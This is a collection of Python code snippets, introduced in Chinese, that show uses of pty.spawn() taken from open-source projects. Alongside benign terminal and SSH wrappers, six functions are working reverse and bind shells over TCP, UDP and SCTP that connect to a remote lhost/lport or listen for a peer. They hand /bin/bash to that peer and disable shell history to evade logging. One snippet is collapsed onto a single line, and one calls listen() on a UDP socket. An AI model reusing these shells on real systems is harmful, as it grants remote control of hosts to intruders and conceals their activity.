我们从 Python 开源项目中提取了以下 15 个代码示例，用于说明如何使用 pty.spawn()。
def connect(srv_model, ctx):
    """Open an interactive SSH session to a server inside a pseudo-terminal.

    The ``ssh`` binary is located on ``PATH`` and invoked with IPv4 only
    (``-4``), forced TTY allocation (``-tt``) and X11 forwarding disabled
    (``-x``).  Host-key checking is switched off and no known-hosts file is
    kept.

    Args:
        srv_model: Object providing ``username`` and ``ip`` attributes.
        ctx: Object whose ``obj`` mapping holds ``"identity_file"`` and an
            iterable of extra arguments under ``"ssh_args"``.

    Raises:
        ValueError: If no ``ssh`` executable can be found.
    """
    ssh_binary = shutil.which("ssh")
    if not ssh_binary:
        raise ValueError("Cannot find ssh command")

    ssh_command = [
        ssh_binary,
        "-4",
        "-tt",
        "-x",
        "-o", "UserKnownHostsFile=/dev/null",
        "-o", "StrictHostKeyChecking=no",
        "-l", srv_model.username,
        "-i", ctx.obj["identity_file"],
        *ctx.obj["ssh_args"],
        srv_model.ip,
    ]

    LOG.debug("Execute %s", ssh_command)
    pty.spawn(ssh_command)
def spawn(self, argv):
    """Fork a child on a new pty, exec ``argv`` in it and return the log.

    Modelled on ``pty.spawn()``.  The parent keeps the master descriptor in
    ``self.master_fd``, runs ``self._init()`` and ``self._copy()``, and
    always finishes with ``self._del()`` before returning or re-raising.

    Args:
        argv: List holding the program name followed by its arguments.

    Returns:
        ``self.log`` decoded with the default codec.
    """
    assert self.master_fd is None
    assert isinstance(argv, list)

    child_pid, self.master_fd = pty.fork()
    if child_pid == pty.CHILD:
        # Replaces the child's process image; does not return on success.
        os.execlp(argv[0], *argv)

    self._init()
    try:
        self._copy()  # pump data until the session ends
    except Exception:
        # Unexpected failure: tear down first, then let it propagate.
        self._del()
        raise
    else:
        self._del()
    return self.log.decode()
def startEmulator(self):
    """Run ``self.shell`` under a pseudo-terminal via ``pty.spawn``.

    ``self.outputCallback`` is handed to ``pty.spawn`` as its second argument
    (the master-read hook) and ``self.inputCallback`` as its third (the
    stdin-read hook).
    """
    command = self.shell
    master_read = self.outputCallback
    stdin_read = self.inputCallback
    pty.spawn(command, master_read, stdin_read)
def ptyShell(action, sock):
    """Run ``/bin/bash`` under a pty with its stdio routed through ``sock``.

    File descriptors 0, 1 and 2 are temporarily pointed at the socket while
    the shell runs.  The process's original stdio is restored afterwards,
    including when ``pty.spawn`` raises, and the temporary duplicates are
    closed so repeated calls do not leak descriptors.

    Args:
        action: Not used by this function; kept for interface compatibility.
        sock: Object exposing ``fileno()`` that carries the shell's input
            and output.

    NOTE(review): whoever holds the other end of ``sock`` gets an interactive
    shell with this process's privileges; callers must authenticate and
    authorize the peer before reaching this point.
    """
    shell_exe = '/bin/bash'
    std_fds = (0, 1, 2)
    sock_fd = sock.fileno()

    # Keep duplicates of the current stdio so it can be put back afterwards.
    saved_fds = [os.dup(fd) for fd in std_fds]
    try:
        for fd in std_fds:
            os.dup2(sock_fd, fd)
        pty.spawn(shell_exe)
    finally:
        # Restore the original stdio and release the temporary duplicates.
        for fd, backup in zip(std_fds, saved_fds):
            os.dup2(backup, fd)
            os.close(backup)
def spawn(self, argv=None):
    """Fork a child on a new pty and exec ``argv`` (or the user's shell).

    Modelled on ``pty.spawn()``.  In the child, the process optionally
    switches to ``self.group`` and ``self.user`` before exec.  In the parent,
    ``self._init_fd()`` and ``self._copy()`` run, and the master descriptor
    is always closed afterwards.

    Args:
        argv: Program name followed by its arguments.  When empty or
            ``None``, ``$SHELL`` is used, falling back to ``/bin/sh`` if the
            variable is unset or empty.
    """
    assert self.master_fd is None
    pid, master_fd = pty.fork()
    self.master_fd = master_fd
    self.pid = pid

    if pid == pty.CHILD:
        # Switch the group BEFORE the user: once the uid has been changed to
        # an unprivileged account, setgid() is no longer permitted.
        if self.group is not None:
            try:
                gid = grp.getgrnam(self.group).gr_gid
            except KeyError:
                log.error("No such group: %s", self.group)
            else:
                os.setgid(gid)
                log.debug('switched group for remote process to %s(%s)',
                          self.group, gid)
        if self.user is not None:
            try:
                uid = pwd.getpwnam(self.user).pw_uid
            except KeyError:
                log.error("No such user: %s", self.user)
            else:
                os.setuid(uid)
                log.debug('switched user for remote process to %s(%s)',
                          self.user, uid)
        if not argv:
            argv = [os.environ.get('SHELL') or '/bin/sh']
        os.execlp(argv[0], *argv)
        # execlp replaces the process image, so this is not reached on success.
        return

    self._init_fd()
    try:
        self._copy()
    except (IOError, OSError):
        # Deliberately ignored, as in the original; presumably raised when
        # the child side of the pty goes away -- TODO confirm.
        pass
    finally:
        # Release the master descriptor even if _copy() fails unexpectedly.
        os.close(master_fd)
        self.master_fd = None
def mongolock_cli():
    """Command-line entry point: run a command while holding a named lock.

    Parses ``--lockname`` (required), ``--block``, ``--timeout`` and the
    command to execute, acquires the lock through
    ``lock.with_autoprolong_lock`` and runs the command under a
    pseudo-terminal for as long as the lock context is active.

    Returns:
        Whatever the ``configure``-decorated inner ``main`` returns.
    """
    @configure
    def main():
        cli = argparse.ArgumentParser(
            description="Run program, acquiring the lock in MongoDB")
        cli.add_argument(
            "-l", "--lockname",
            required=True,
            help="Name of the lock")
        cli.add_argument(
            "-b", "--block",
            action="store_true",
            default=False,
            help="Block execution till lock will be available")
        cli.add_argument(
            "-t", "--timeout",
            type=int,
            default=None,
            help="Timeout for blocking")
        cli.add_argument(
            "command",
            nargs=argparse.ONE_OR_MORE,
            help="Command to run")
        args = cli.parse_args()

        held_lock = lock.with_autoprolong_lock(
            args.lockname, block=args.block, timeout=args.timeout)
        with held_lock:
            pty.spawn(args.command)

    return main()
def main():
    """Connect to ``host port`` from the command line and run ``shell`` on it.

    Expects exactly two command-line arguments (host and port).  After a
    successful TCP connect, descriptors 0, 1 and 2 are pointed at the socket,
    the shell-history environment variables are cleared or zeroed, and the
    module-level ``shell`` is started under a pseudo-terminal.

    NOTE(review): this hands an interactive shell to the remote endpoint and
    disables shell history; it must only be used on systems where that is
    explicitly authorized.
    """
    if len(sys.argv) != 3:
        usage(sys.argv[0])
        sys.exit()

    host, port = sys.argv[1], sys.argv[2]
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, int(port)))
        print('connect ok')
    except:
        print('connect faild')
        sys.exit()

    for std_fd in (0, 1, 2):
        os.dup2(s.fileno(), std_fd)

    history_vars = (
        "HISTFILE", "HISTFILESIZE", "HISTSIZE", "HISTORY",
        "HISTSAVE", "HISTZONE", "HISTLOG", "HISTCMD",
    )
    for var_name in history_vars:
        os.unsetenv(var_name)

    history_overrides = (
        ("HISTFILE", '/dev/null'),
        ("HISTSIZE", '0'),
        ("HISTFILESIZE", '0'),
    )
    for var_name, var_value in history_overrides:
        os.putenv(var_name, var_value)

    pty.spawn(shell)
    s.close()
def _delay_for_pipe(self, env=None, delay=None): # This delay is sometimes needed because the temporary stdin file that # is being written (the pipe) may not have even hits its first flush() # call by the time the spawned process starts up and determines there # is nothing in the file. The spawn can thus exit, without doing any # real work. Consider the case of piping something into grep: # # $ ps aux | grep root # # grep will exit on EOF and so there is a race between the buffersize # and flushing the temporary file and grep. However, this race is not # always meaningful. Pagers, for example, update when the file is written # to. So what is important is that we start the spawned process ASAP: # # $ ps aux | less # # So there is a push-and-pull between the the competing objectives of # not blocking and letting the spawned process have enough to work with # such that it doesn't exit prematurely. Unfortunately, there is no # way to know a priori how big the file is, how long the spawned process # will run for, etc. Thus as user-definable delay let's the user # find something that works for them. if delay is None: delay = (env or os.environ).get('TEEPTY_PIPE_DELAY', -1.0) delay = float(delay) if 0.0 < delay: time.sleep(delay)
def run_interactive(cmd):
    """Run ``cmd`` under a pty, record its output and ask about a re-run.

    Everything read from the pty master is captured while the command runs.
    The capture is decoded as UTF-8, falling back to cp437 when that fails.

    Args:
        cmd: Command passed straight to ``pty.spawn``.

    Returns:
        A ``(status, result, again)`` tuple: ``status`` is always
        ``'success'``, ``result`` is the decoded recording and ``again`` is
        True when the user's answer starts with "y" (case-insensitive).
    """
    print('Recording {}. Send EOF (^D) to end.'.format(cmd), end='\n\n')

    # Recording hook, following the example in the stdlib `pty` docs.
    captured = []

    def read(fd):
        data = os.read(fd, 1024)
        captured.append(data)
        return data

    # TODO: update this with try/except clauses as we find exceptions
    pty.spawn(cmd, read)

    raw = b''.join(captured)
    try:
        result = raw.decode(encoding='utf-8')
    except UnicodeDecodeError:
        result = raw.decode(encoding='cp437')

    print('\nSubmission recording completed.')
    answer = input('Do you want to run the submission again? [y/N]: ')
    return ('success', result, answer.lower().startswith('y'))
def main():
    """Bind to ``lport``, accept one peer and run bash with stdio on it.

    Descriptors 0, 1 and 2 are pointed at the accepted connection,
    ``HISTFILE`` is set to ``/dev/null`` and ``/bin/bash`` is started under a
    pseudo-terminal.

    NOTE(review): this exposes an unauthenticated interactive shell to
    whoever connects; only for explicitly authorized test environments.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.bind(('', lport))
    # NOTE(review): listen()/accept() are stream-socket operations; on a
    # SOCK_DGRAM socket they are expected to raise OSError -- confirm the
    # intended socket type.
    listener.listen(1)
    rem, _addr = listener.accept()

    for std_fd in (0, 1, 2):
        os.dup2(rem.fileno(), std_fd)

    os.putenv("HISTFILE", '/dev/null')
    pty.spawn("/bin/bash")
    listener.close()
def main():
    """Connect over TCP to ``(lhost, lport)`` and run bash with stdio on it.

    Descriptors 0, 1 and 2 are pointed at the connected socket, ``HISTFILE``
    is set to ``/dev/null`` and ``/bin/bash`` is started under a
    pseudo-terminal.  The socket is closed once the shell exits.

    NOTE(review): this hands an interactive shell to the remote endpoint;
    only for explicitly authorized test environments.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((lhost, lport))

    for std_fd in (0, 1, 2):
        os.dup2(conn.fileno(), std_fd)

    os.putenv("HISTFILE", '/dev/null')
    pty.spawn("/bin/bash")
    conn.close()
def main():
    """Connect a UDP socket to ``(lhost, lport)`` and run bash with stdio on it.

    Descriptors 0, 1 and 2 are pointed at the datagram socket, ``HISTFILE``
    is set to ``/dev/null`` and ``/bin/bash`` is started under a
    pseudo-terminal.  The socket is closed once the shell exits.

    NOTE(review): this hands an interactive shell to the remote endpoint;
    only for explicitly authorized test environments.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    conn.connect((lhost, lport))

    for std_fd in (0, 1, 2):
        os.dup2(conn.fileno(), std_fd)

    os.putenv("HISTFILE", '/dev/null')
    pty.spawn("/bin/bash")
    conn.close()
def main():
    """Connect an SCTP socket to ``(lhost, lport)`` and run bash with stdio on it.

    The socket comes from ``sctpsocket_tcp``.  Descriptors 0, 1 and 2 are
    pointed at it, ``HISTFILE`` is set to ``/dev/null`` and ``/bin/bash`` is
    started under a pseudo-terminal.  The socket is closed once the shell
    exits.

    NOTE(review): this hands an interactive shell to the remote endpoint;
    only for explicitly authorized test environments.
    """
    conn = sctpsocket_tcp(socket.AF_INET)
    conn.connect((lhost, lport))

    for std_fd in (0, 1, 2):
        os.dup2(conn.fileno(), std_fd)

    os.putenv("HISTFILE", '/dev/null')
    pty.spawn("/bin/bash")
    conn.close()
def main():
    """Listen on ``lport`` over SCTP, accept one peer and run bash on it.

    The listening socket comes from ``sctpsocket_tcp``.  Descriptors 0, 1 and
    2 are pointed at the accepted connection, ``HISTFILE`` is set to
    ``/dev/null`` and ``/bin/bash`` is started under a pseudo-terminal.  The
    listening socket is closed once the shell exits.

    NOTE(review): this exposes an unauthenticated interactive shell to
    whoever connects; only for explicitly authorized test environments.
    """
    listener = sctpsocket_tcp(socket.AF_INET)
    listener.bind(('', lport))
    listener.listen(1)
    rem, _addr = listener.accept()

    for std_fd in (0, 1, 2):
        os.dup2(rem.fileno(), std_fd)

    os.putenv("HISTFILE", '/dev/null')
    pty.spawn("/bin/bash")
    listener.close()